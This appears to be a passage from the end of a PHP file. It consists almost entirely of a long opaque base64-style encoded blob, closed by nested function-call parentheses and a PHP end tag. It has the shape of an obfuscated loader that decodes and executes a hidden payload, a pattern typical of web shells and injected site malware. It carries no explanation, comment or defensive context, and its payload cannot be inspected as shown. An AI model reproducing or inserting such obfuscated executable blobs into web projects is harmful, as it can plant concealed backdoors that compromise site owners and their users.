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')));
?>